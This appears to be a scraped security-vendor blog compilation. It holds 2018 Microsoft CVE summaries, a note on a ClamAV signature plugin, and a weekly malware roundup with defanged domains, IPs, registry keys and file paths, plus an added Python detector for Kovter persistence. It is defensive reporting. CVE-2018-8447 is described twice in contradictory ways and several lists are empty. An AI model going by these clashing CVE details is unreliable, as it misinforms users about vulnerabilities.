CVE-2018-8391 is a remote code execution vulnerability in the Chakra scripting engine. An attacker who exploits it gains the rights of the current user, so the impact is greatest when the user is logged on with an administrative account.

CVE-2018-8439 is a remote code execution vulnerability in the Windows Hyper-V hypervisor. The bug exists in Hyper-V's validation on a host server. An attacker can exploit this flaw by running a specially crafted application on a guest operating system that could lead to the machine running Hyper-V executing arbitrary code.

CVE-2018-8447 is a remote code execution vulnerability in Internet Explorer. An attacker could exploit this vulnerability by tricking a user into visiting a specially crafted web page while using the Internet Explorer browser, or by taking advantage of a compromised website through advertisements or attachments that the user would have to click on.

CVE-2018-8456 and CVE-2018-8459 are remote code execution vulnerabilities that exist in the Chakra scripting engine's handling of objects in memory. These bugs could corrupt memory in a way that allows an attacker to execute arbitrary code with the same rights as the current user.

CVE-2018-8457 is a remote code execution vulnerability that exists in the way Microsoft web browsers' scripting engines handle objects in memory. An attacker could host a specially crafted website to exploit this vulnerability, and then convince the user to visit the website while using a Microsoft web browser, or they could embed an ActiveX control that is marked "safe for initialization" in a Microsoft Office file or an application that hosts the browser's rendering engine.

CVE-2018-8464 is a remote code execution vulnerability in Microsoft Edge's PDF reader that exists in the way the reader handles objects in memory. An attacker could exploit this bug by convincing a user to click on a web page that contains a malicious PDF, or by hosting the PDF on websites that host user-provided content.

CVE-2018-8465, CVE-2018-8466 and CVE-2018-8467 are remote code execution vulnerabilities in the Chakra scripting engine that lie in the way it handles objects in memory in the Microsoft Edge web browser. An attacker can exploit these bugs by tricking the user into opening a malicious web page, or an advertisement that is hosted on a website that allows user-provided content.

The other critical vulnerability is:

    Important vulnerabilities


    There is also coverage for 43 important vulnerabilities, 11 of which we wish to highlight.

    CVE-2018-8354 is a remote code execution vulnerability that exists in the way the scripting engine handles objects in memory in the Microsoft Edge web browser. A user would need to visit a specially crafted, malicious website in order to trigger this vulnerability.

    CVE-2018-8392 and CVE-2018-8393 are buffer overflow vulnerabilities in the Microsoft Jet Database Engine. To exploit these bugs, a user must open a specially crafted Excel file while using an at-risk version of Windows. An attacker could exploit these vulnerabilities to execute code on the victim's machine at an administrator's level.

    CVE-2018-8430 is a remote code execution vulnerability in Microsoft Word 2013 and 2016. An attacker can exploit this by tricking a user into opening a specially crafted, malicious PDF.

    CVE-2018-8447 is an elevation of privilege vulnerability that lies in the way Windows processes calls to Advanced Local Procedure Call (ALPC). An attacker would need to log onto the system directly in order to exploit this vulnerability, and then run a specially crafted application.

    CVE-2018-8331 is a remote code execution vulnerability in Microsoft Excel that exists when the software fails to correctly handle objects in memory. A user could trigger this bug by opening a specially crafted, malicious file in an email or on a web page.

    CVE-2018-8315 is an information disclosure vulnerability in Microsoft's scripting engine that could expose uninitialized memory if exploited. An attacker could access this information by convincing a user to visit a malicious website and then leveraging the vulnerability to obtain privileged data from the browser process.

    CVE-2018-8335 is a denial-of-service vulnerability in Microsoft Server Message Block (SMB). An attacker can send a specially crafted request to the server to trigger this vulnerability.

    CVE-2018-8425 is a spoofing vulnerability in the Microsoft Edge web browser. The bug lies in the way the browser handles specific HTML content. If an attacker correctly exploits this bug, a user could be tricked into thinking they are visiting a legitimate website when they are actually on a malicious page.

    CVE-2018-8440 is an elevation of privilege vulnerability that occurs when Windows incorrectly handles calls to Advanced Local Procedure Call (ALPC). An attacker needs to log onto the system directly to exploit this vulnerability, and then run a specially crafted application to take over the system. This vulnerability has been spotted in the wild as part of several pieces of malware.

    The other vulnerabilities that are rated "important" are:


      Coverage


      In response to these vulnerability disclosures, Talos is releasing the following Snort rules that detect attempts to exploit them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Firepower customers should use the latest update to their ruleset by updating their SRU. Open Source Snort Subscriber Rule Set customers can stay up-to-date by downloading the latest rule pack available for purchase on Snort.org.

      Snort Rules: 45142-45143, 47702-47703, 47717-47718, 47730-47741, 47745-47748


      SigAnalyzer: Signature analysis with CASC


      Executive summary



      ClamAV Signature Creator (CASC) is an IDA Pro plugin that assists in the creation of ClamAV pattern signatures. We have enhanced this plugin to also analyze these signatures: given a particular signature, the plugin highlights the matching parts in a binary. This function is helpful when evaluating automatically generated signatures, e.g., from the BASS framework. As more signatures are generated automatically, it becomes ever more important to gain a quick understanding of their effects. This functionality will allow us to check the accuracy of our signatures faster and deliver a better product to our users.

      You can read the complete post and see the associated video on the ClamAV blog.




      Threat Roundup for September 7 to September 14


      Today, as we do every week, Talos is giving you a glimpse into the most prevalent threats we’ve observed this week — covering the dates between Sept. 7 and 14. As with previous roundups, this post isn’t meant to be an in-depth analysis. Instead, we will summarize the threats we’ve observed by highlighting key behavioral characteristics and indicators of compromise, and discussing how our customers are automatically protected from these threats.

      As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

      The most prevalent threats highlighted in this roundup are:

      • Win.Dropper.Gamarue-6682684-0
        Dropper
        Gamarue, also known as Andromeda, is a botnet used to spread malware, steal information and perform other illicit activities, such as click fraud.
         
      • Doc.Downloader.Powload-6681541-0
        Downloader
        Powload is a malicious document that uses PowerShell to download malware. This campaign is currently distributing the Emotet malware.
         
      • Win.Dropper.Hploki-6682476-0
        Dropper
        HpLoki is spread via malspam and is designed to steal passwords and user credentials for common programs such as Firefox and Outlook.
         
      • Win.Dropper.Emotet-6681708-0
        Dropper
        Emotet is a banking trojan with remote access capability that has remained relevant due to its continual evolution to bypass antivirus products.
         
      • Win.Dropper.Kovter-6681669-0
        Dropper
        Kovter is known for its fileless persistence mechanism. This family of malware creates several malicious registry entries that store its malicious code. Kovter is capable of reinfecting a system even if the file system has been cleaned of the infection. Kovter has been used in the past to spread ransomware and click-fraud malware.
         
      • Win.Dropper.Bredolab-6681668-0
        Dropper
        Bredolab is a trojan with remote access capability that downloads and distributes other malware such as botnets and Remote Access Trojans (RATs).
         
      • Win.Dropper.Johnnie-6681665-0
        Dropper
        Johnnie, also known as Mikey, is a malware family that focuses on persistence, and is known for its plugin architecture.
         
      • Win.Dropper.Zbot-6681657-0
        Dropper
        Zbot, also known as Zeus, is a trojan with remote access capability that steals information such as banking credentials using a variety of methods, including key-logging and form-grabbing.
         
      • Doc.Dropper.Valyria-6680534-0
        Dropper
        Valyria is a malicious Microsoft Word document family that is used to distribute other malware. This campaign is currently spreading Emotet.
         
      • Win.Dropper.Darkkomet-6680876-0
        Dropper
        DarkKomet is a freeware remote access tool that was released by an independent software developer. It provides the same functionality you would expect from a remote access tool: keylogging, webcam access, microphone access, remote desktop, URL download, program execution, etc.
         
      • Win.Dropper.Ponystealer-6680912-0
        Dropper
        Ponystealer is known to steal credentials from more than 100 different applications and may also install other malware such as a Remote Access Trojan (RAT).
         
      • Win.Dropper.Tspy-6680869-0
        Dropper
        The Tspy trojan is used to steal information, such as banking credentials, and installs a remote-access backdoor.
         
      • Win.Dropper.Fareit-6680873-0
        Dropper
        The Fareit trojan is primarily an information stealer that can download and install other malware.
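
      Kovter's registry-based persistence, described in the list above, leaves a recognisable shape in a registry export: a Run value that launches a .lnk or .bat from a random hex directory under AppData, plus a custom file extension registered under HKCR whose ProgID carries a shell\open\command handler (compare the HKCR\.8CA9D79 and HKCR\C3B616\SHELL\OPEN\COMMAND keys and the %LocalAppData%\4dd3cc\*.lnk/.bat files in the Kovter IoC list below). The following is an added example, not Talos code: it parses a constructed .reg-style export and correlates those two indicators. The link between .8CA9D79 and the C3B616 ProgID, the Run value's target and the handler command are assumptions and placeholders, not captured data.

```python
"""Heuristic check for Kovter-style fileless persistence in a registry export.

Added example, not Talos code. The sample export is constructed: the link
between .8CA9D79 and the C3B616 ProgID, the Run value's target and the
handler command are assumptions, not captured data.
"""
import re
from typing import Dict, List

Hive = Dict[str, Dict[str, str]]  # registry key path -> {value name: data}

# Constructed benign entries (a normal Run value and the .txt association).
BENIGN_REG = r"""
[HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN]
"OneDrive"="C:\\Users\\victim\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe /background"

[HKEY_CLASSES_ROOT\.txt]
@="txtfile"

[HKEY_CLASSES_ROOT\txtfile\shell\open\command]
@="%SystemRoot%\\system32\\NOTEPAD.EXE %1"
"""

# Constructed Kovter-like entries shaped after the roundup's IoC list.
KOVTER_LIKE_REG = r"""
[HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN]
"vrxzdhbyv"="C:\\Users\\victim\\AppData\\Local\\4dd3cc\\d95adb.lnk"

[HKEY_CLASSES_ROOT\.8CA9D79]
@="C3B616"

[HKEY_CLASSES_ROOT\C3B616\shell\open\command]
@="<handler command placeholder>"
"""


def parse_reg_export(text: str) -> Hive:
    """Parse the .reg subset used here: [key] headers plus "name"="data" or
    @="data" lines. Key paths are upper-cased; doubled backslashes collapsed."""
    hive: Hive = {}
    current = None
    value_re = re.compile(r'^(@|"([^"]*)")=(?:"((?:[^"\\]|\\.)*)"|(.*))$')
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].upper()
            hive.setdefault(current, {})  # repeated headers merge into one key
            continue
        m = value_re.match(line)
        if m and current is not None:
            name = "" if m.group(1) == "@" else m.group(2)
            data = m.group(3) if m.group(3) is not None else m.group(4)
            hive[current][name] = data.replace("\\\\", "\\")
    return hive


HEX_NAME = re.compile(r"^[0-9A-F]{6,8}$")  # random hex names like .8CA9D79 / C3B616
LAUNCHER = re.compile(r"\\AppData\\(Local|Roaming)\\[0-9a-f]{6}\\[0-9a-f]{6}\.(lnk|bat)\b", re.I)
RUN_KEYS = (
    r"HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN",
    r"HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN",
    r"HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN",
)


def suspicious_extensions(hive: Hive) -> List[dict]:
    """HKCR extensions with random hex names whose ProgID registers a
    shell\\open\\command handler (the HKCR\\.8CA9D79 / C3B616 pattern)."""
    findings = []
    prefix = "HKEY_CLASSES_ROOT\\."
    for key, values in hive.items():
        if not key.startswith(prefix):
            continue
        ext = key[len(prefix):]
        progid = values.get("", "")  # the extension key's default value names the ProgID
        cmd_key = f"HKEY_CLASSES_ROOT\\{progid.upper()}\\SHELL\\OPEN\\COMMAND"
        if HEX_NAME.match(ext) and progid and cmd_key in hive:
            findings.append({"extension": "." + ext, "progid": progid,
                             "command": hive[cmd_key].get("", "")})
    return findings


def suspicious_run_entries(hive: Hive) -> List[dict]:
    """Run values launching a .lnk/.bat from a random hex directory under
    AppData, the shape of %LocalAppData%\\4dd3cc\\d95adb.lnk in the IoC list."""
    findings = []
    for run_key in RUN_KEYS:
        for name, data in hive.get(run_key, {}).items():
            if LAUNCHER.search(data):
                findings.append({"key": run_key, "value": name, "command": data})
    return findings


def assess(reg_text: str) -> dict:
    """Correlate both indicators; flag Kovter-like only when both are present."""
    hive = parse_reg_export(reg_text)
    exts = suspicious_extensions(hive)
    runs = suspicious_run_entries(hive)
    return {"extensions": exts, "run_entries": runs, "kovter_like": bool(exts and runs)}


if __name__ == "__main__":
    print(assess(BENIGN_REG + KOVTER_LIKE_REG))
```

      Run it against `reg export` output of the Run keys and HKCR; a hit on only one of the two indicators is worth a look but is not reported as Kovter-like on its own.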
         

      Threats


      Win.Dropper.Gamarue-6682684-0


      Indicators of Compromise


      Registry Keys
      • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\ADVANCED
        • Value Name: Hidden
      • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
        • Value Name: Windows Update
      Mutexes
      • 3749282D282E1E80C56CAE5A
      IP Addresses
      Domain Names
      Files and or directories created
      • %AppData%\WindowsUpdate.exe
      • %AppData%\pid.txt
      • %AppData%\pidloc.txt
      • %LocalAppData%\Temp\holdermail.txt
      • %LocalAppData%\Temp\holderwb.txt
      • %AppData%\D282E1\1E80C5.lck
      • \Sys.exe
      • %LocalAppData%\Temp\bhvDE00.tmp
      File Hashes

      Coverage


      Screenshots of Detection

      AMP



      ThreatGrid



      Umbrella



      Doc.Downloader.Powload-6681541-0


      Indicators of Compromise


      Registry Keys
      • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\WPAD\{CFFE6C1B-C698-4A68-B86B-DD768F696445}
        • Value Name: WpadDecisionReason
      • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\WPAD\{CFFE6C1B-C698-4A68-B86B-DD768F696445}
        • Value Name: WpadDecision
      • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\WPAD\{CFFE6C1B-C698-4A68-B86B-DD768F696445}
        • Value Name: WpadNetworkName
      • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\WPAD\{CFFE6C1B-C698-4A68-B86B-DD768F696445}
        • Value Name: WpadDetectedUrl
      • <HKLM>\SYSTEM\CONTROLSET001\SERVICES\DIMCLOUD
        • Value Name: Type
      • <HKLM>\SYSTEM\CONTROLSET001\SERVICES\DIMCLOUD
        • Value Name: Start
      • <HKLM>\SYSTEM\CONTROLSET001\SERVICES\DIMCLOUD
        • Value Name: ErrorControl
      • <HKLM>\SYSTEM\CONTROLSET001\SERVICES\DIMCLOUD
        • Value Name: ImagePath
      • <HKLM>\SYSTEM\CONTROLSET001\SERVICES\DIMCLOUD
        • Value Name: DisplayName
      • <HKLM>\SYSTEM\CONTROLSET001\SERVICES\DIMCLOUD
        • Value Name: WOW64
      • <HKLM>\SYSTEM\CONTROLSET001\SERVICES\DIMCLOUD
        • Value Name: ObjectName
      • <HKLM>\SYSTEM\CONTROLSET001\SERVICES\DIMCLOUD
        • Value Name: Description
      • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\WPAD\{CFFE6C1B-C698-4A68-B86B-DD768F696445}
        • Value Name: WpadDecisionTime
      • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\WPAD\66-B3-8A-86-98-63
        • Value Name: WpadDecisionReason
      • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\WPAD\66-B3-8A-86-98-63
        • Value Name: WpadDecisionTime
      • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\WPAD\66-B3-8A-86-98-63
        • Value Name: WpadDecision
      • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\WPAD\66-B3-8A-86-98-63
        • Value Name: WpadDetectedUrl
      Mutexes
      • Global\I98B68E3C
      • Global\M98B68E3C
      IP Addresses
      Domain Names
      • amniyatgostariranian[.]ir
      Files and or directories created
      • %LocalAppData%\Temp\rmfwlhcy.zma.psm1
      • %LocalAppData%\Temp\sex1tusl.bnb.ps1
      • %UserProfile%\802.exe
      File Hashes

      Coverage


      Screenshots of Detection

      AMP




      ThreatGrid




      Umbrella



      Win.Dropper.Hploki-6682476-0


      Indicators of Compromise


      Registry Keys
      • <HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
      • <HKCU>\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
      • <HKCU>\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\
      • <HKCU>\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook_2016\
      • <HKLM>\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\
      • <HKLM>\SOFTWARE\Wow6432Node\Mozilla\Mozilla Thunderbird\
      • <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
        • Value Name: LTXD9TT0THZ
      Mutexes
      • 8-3503835SZBFHHZ
      • OQO3TQDA3CDEA0Az
      IP Addresses
      Domain Names
      Files and or directories created
      • %AppData%\OQO3TQDA\OQOlog.ini
      • %AppData%\OQO3TQDA\OQOlogim.jpeg
      • %AppData%\OQO3TQDA\OQOlogrc.ini
      • %AppData%\OQO3TQDA\OQOlogri.ini
      • %AppData%\OQO3TQDA\OQOlogrv.ini
      • %LocalAppData%\Temp\PNj.exe
      • \TEMP\Documenti contrattuali.pdf.exe
      • %LocalAppData%\Temp\U97.exe
      File Hashes

      Coverage


      Screenshots of Detection

      ThreatGrid




      Umbrella



      Win.Dropper.Emotet-6681708-0


      Indicators of Compromise


      Registry Keys
      • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\WPAD\{CFFE6C1B-C698-4A68-B86B-DD768F696445}
        • Value Name: WpadDecisionReason
      • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\WPAD\{CFFE6C1B-C698-4A68-B86B-DD768F696445}
        • Value Name: WpadDecision
      • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\WPAD\{CFFE6C1B-C698-4A68-B86B-DD768F696445}
        • Value Name: WpadNetworkName
      • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\WPAD\{CFFE6C1B-C698-4A68-B86B-DD768F696445}
        • Value Name: WpadDetectedUrl
      • <HKLM>\SYSTEM\CONTROLSET001\SERVICES\DIMCLOUD
        • Value Name: Type
      • <HKLM>\SYSTEM\CONTROLSET001\SERVICES\DIMCLOUD
        • Value Name: Start
      • <HKLM>\SYSTEM\CONTROLSET001\SERVICES\DIMCLOUD
        • Value Name: ErrorControl
      • <HKLM>\SYSTEM\CONTROLSET001\SERVICES\DIMCLOUD
        • Value Name: ImagePath
      • <HKLM>\SYSTEM\CONTROLSET001\SERVICES\DIMCLOUD
        • Value Name: DisplayName
      • <HKLM>\SYSTEM\CONTROLSET001\SERVICES\DIMCLOUD
        • Value Name: WOW64
      • <HKLM>\SYSTEM\CONTROLSET001\SERVICES\DIMCLOUD
        • Value Name: ObjectName
      • <HKLM>\SYSTEM\CONTROLSET001\SERVICES\DIMCLOUD
        • Value Name: Description
      • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\WPAD\{CFFE6C1B-C698-4A68-B86B-DD768F696445}
        • Value Name: WpadDecisionTime
      • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\WPAD\88-29-91-6E-18-27
        • Value Name: WpadDecisionReason
      • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\WPAD\88-29-91-6E-18-27
        • Value Name: WpadDecisionTime
      • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\WPAD\88-29-91-6E-18-27
        • Value Name: WpadDecision
      • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\WPAD\88-29-91-6E-18-27
        • Value Name: WpadDetectedUrl
      Mutexes
      • Global\I98B68E3C
      • Global\M98B68E3C
      IP Addresses
      Domain Names
      • N/A
      Files and or directories created
      • %WinDir%\SysWOW64\M2uHY39lfNiv.exe
      File Hashes

      Coverage


      Screenshots of Detection

      AMP




      ThreatGrid





      Win.Dropper.Kovter-6681669-0


      Indicators of Compromise


      Registry Keys
      • <HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE
        • Value Name: DisableOSUpgrade
      • <HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE\OSUPGRADE
        • Value Name: ReservationsAllowed
      • <HKLM>\SOFTWARE\WOW6432NODE\XVYG
        • Value Name: xedvpa
      • <HKCU>\SOFTWARE\XVYG
        • Value Name: xedvpa
      • <HKLM>\SOFTWARE\WOW6432NODE\XVYG
        • Value Name: tbqjcmuct
      • <HKCU>\SOFTWARE\XVYG
        • Value Name: tbqjcmuct
      • <HKCR>\.8CA9D79
      • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
        • Value Name: vrxzdhbyv
      • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
        • Value Name: ssishoff
      • <HKLM>\SOFTWARE\WOW6432NODE\XVYG
        • Value Name: lujyoqmfl
      • <HKCU>\SOFTWARE\XVYG
        • Value Name: lujyoqmfl
      • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.101
        • Value Name: CheckSetting
      • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.103
        • Value Name: CheckSetting
      • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.100
        • Value Name: CheckSetting
      • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.102
        • Value Name: CheckSetting
      • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.104
        • Value Name: CheckSetting
      • <HKLM>\SOFTWARE\WOW6432NODE\47A463C672DD6D6581
        • Value Name: 5CFEE7CEF48215E1
      • <HKLM>\SOFTWARE\WOW6432NODE\VDZEICWMAK
        • Value Name: X6VQZvnwo7
      • <HKLM>\SOFTWARE\WOW6432NODE\VDZEICWMAK
        • Value Name: ntPgALczv
      • <HKCU>\SOFTWARE\XVYG
        • Value Name: tnzok
      • <HKLM>\SOFTWARE\WOW6432NODE\XVYG
        • Value Name: tnzok
      • <HKCU>\SOFTWARE\XVYG
        • Value Name: usukxpt
      • <HKLM>\SOFTWARE\WOW6432NODE\XVYG
        • Value Name: usukxpt
      • <HKLM>\SOFTWARE\WOW6432NODE\XVYG
        • Value Name: svdjlvs
      • <HKCU>\SOFTWARE\XVYG
        • Value Name: svdjlvs
      • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
        • Value Name: fcbburq
      • <HKCR>\C3B616\SHELL\OPEN\COMMAND
      Mutexes
      • B3E8F6F86CDD9D8B
      • A83BAA13F950654C
      • EA4EC370D1E573DA
      • Global\7A7146875A8CDE1E
      IP Addresses
      Domain Names
      • bscw[.]paritaet[.]net
      • www[.]dso[.]pl
      Files and or directories created
      • %LocalAppData%\4dd3cc\519d0f.bat
      • %LocalAppData%\4dd3cc\8e9866.8ca9d79
      • %LocalAppData%\4dd3cc\d95adb.lnk
      • %AppData%\b08d66\0b3c0b.8ca9d79
      • %LocalAppData%\Temp\~DF5BCE8BF7EE69B404.TMP
      • %LocalAppData%\Temp\g1b14dab.rdk.ps1
      • %LocalAppData%\Temp\pey0h1im.c1n.psm1
      File Hashes

      Coverage

      Screenshots of Detection

      AMP

      ThreatGrid

      Win.Dropper.Bredolab-6681668-0


      Indicators of Compromise


      Registry Keys
      • <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
        • Value Name: HKLM
      • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
        • Value Name: HKCU
      • <HKCU>\SOFTWARE\CYBER
        • Value Name: FirstExecution
      • <HKCU>\SOFTWARE\CYBER
        • Value Name: NewIdentification
      • <HKCU>\SOFTWARE\CYBER
        • Value Name: NewGroup
      Mutexes
      • Administrator1
      • Administrator4
      • Administrator5
      IP Addresses
      • 212[.]52[.]43[.]195
      • 52[.]8[.]126[.]80
      Domain Names
      Files and or directories created
      • %LocalAppData%\Temp\Administrator2.txt
      • %LocalAppData%\Temp\Administrator7
      • %LocalAppData%\Temp\Administrator8
      • %AppData%\Administratorlog.dat
      • %WinDir%\SysWOW64\WinDir\Svchost.exe
      File Hashes

      Coverage

      Screenshots of Detection

      AMP

      ThreatGrid

      Win.Dropper.Johnnie-6681665-0


      Indicators of Compromise


      Registry Keys
      • <HKLM>\Software\Wow6432Node\Microsoft\MediaPlayer\Preferences\
      • <HKCU>\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\HTTP
      • <HKCU>\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\RTSP
      • <HKCU>\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying\
      • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
        • Value Name: Video Display Driver
      • <HKCU>\SOFTWARE\DN-AKFCC
        • Value Name: ServerStarted
      • <HKCU>\SOFTWARE\DN-AKFCC
        • Value Name: InstalledServer
      • <HKCU>\SOFTWARE\CROSSFIRE
        • Value Name: NewIdentification
      • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
        • Value Name: Isass
      • <HKCU>\SOFTWARE\LAMMER
        • Value Name: FirstExecution
      • <HKCU>\SOFTWARE\LAMMER
        • Value Name: NewIdentification
      • <HKCU>\SOFTWARE\CROSSFIRE
        • Value Name: FirstExecution
      Mutexes
      • _SHuassist.mtx
      • _x_X_BLOCKMOUSE_X_x_
      • _x_X_PASSWORDLIST_X_x_
      • _x_X_UPDATE_X_x_
      • sr54g65dg45ds5s8798ae
      • sr54g65dg45ds5s8798ae_PERSIST
      • XTREMEUPDATE
      • dN-AKfcC
      • dN-AKfcCPERSIST
      • sr54g65dg45ds5s8798ae_SAIR
      • dN-AKfcCEXIT
      • Isass
      • Isass_PERSIST
      • Global\2fbe6fe1-b6df-11e8-8419-00501e3ae7b5
      • Isass_SAIR
      IP Addresses
      Domain Names
      • codelux2017[.]ddns[.]net
      • skypeprocesshost[.]ddns[.]com[.]br
      • homersides[.]duckdns[.]org
      • ducklife[.]ddns[.]net
      • wandersongay[.]ddns[.]net
      Files and or directories created
      • %LocalAppData%\Temp\XX--XX--XX.txt
      • %WinDir%\Root\Video Display Driver.exe
      • %WinDir%\SysWOW64\hi-IM\csrss.exe
      • %LocalAppData%\Temp\UuU.uUu
      • %LocalAppData%\Temp\XxX.xXx
      • %WinDir%\SysWOW64\Isass.exe
      File Hashes

      Coverage

      Screenshots of Detection

      AMP

      ThreatGrid

      Win.Dropper.Zbot-6681657-0


      Indicators of Compromise


      Registry Keys
      • <HKCU>\SOFTWARE\MICROSOFT\INTERNET EXPLORER\PRIVACY
        • Value Name: CleanCookies
      • <HKCU>\SOFTWARE\MICROSOFT\AHPYE
        • Value Name: Toitqa
      • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
        • Value Name: {913237A3-A7F1-4D42-F774-A9CF00C8A7BB}
      • <HKLM>\System\CurrentControlSet\Services\NapAgent\Shas
      • <HKLM>\System\CurrentControlSet\Services\NapAgent\Qecs
      • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.101
        • Value Name: CheckSetting
      • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.103
        • Value Name: CheckSetting
      • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.100
        • Value Name: CheckSetting
      • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.102
        • Value Name: CheckSetting
      • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.104
        • Value Name: CheckSetting
      Mutexes
      • Global\{FA015A2D-CA7F-2671-F774-A9CF00C8A7BB}
      • Local\{93231DB1-8DE3-4F53-F774-A9CF00C8A7BB}
      IP Addresses
      • N/A
      Domain Names
      • grandesupport[.]biz
      Files and or directories created
      • N/A
      File Hashes

      Coverage

      Screenshots of Detection

      AMP

      ThreatGrid

      Umbrella

      Doc.Dropper.Valyria-6680534-0


      Indicators of Compromise


      Registry Keys
      • N/A
      Mutexes
      • Global\552FFA80-3393-423d-8671-7BA046BB5906
      IP Addresses
      • 173[.]201[.]185[.]6
      • 103[.]27[.]232[.]26
      • 104[.]236[.]33[.]143
      • 184[.]168[.]188[.]1
      • 91[.]216[.]107[.]152
      Domain Names
      • fithealthyliving[.]net
      • staging-geblog[.]b2ldigitalprojects[.]com
      • arcbko[.]com
      • wcspl[.]org
      • bechner[.]com
      Files and or directories created
      • %LocalAppData%\Temp\538.exe
      • %LocalAppData%\Temp\kg4a5d2p.1ae.ps1
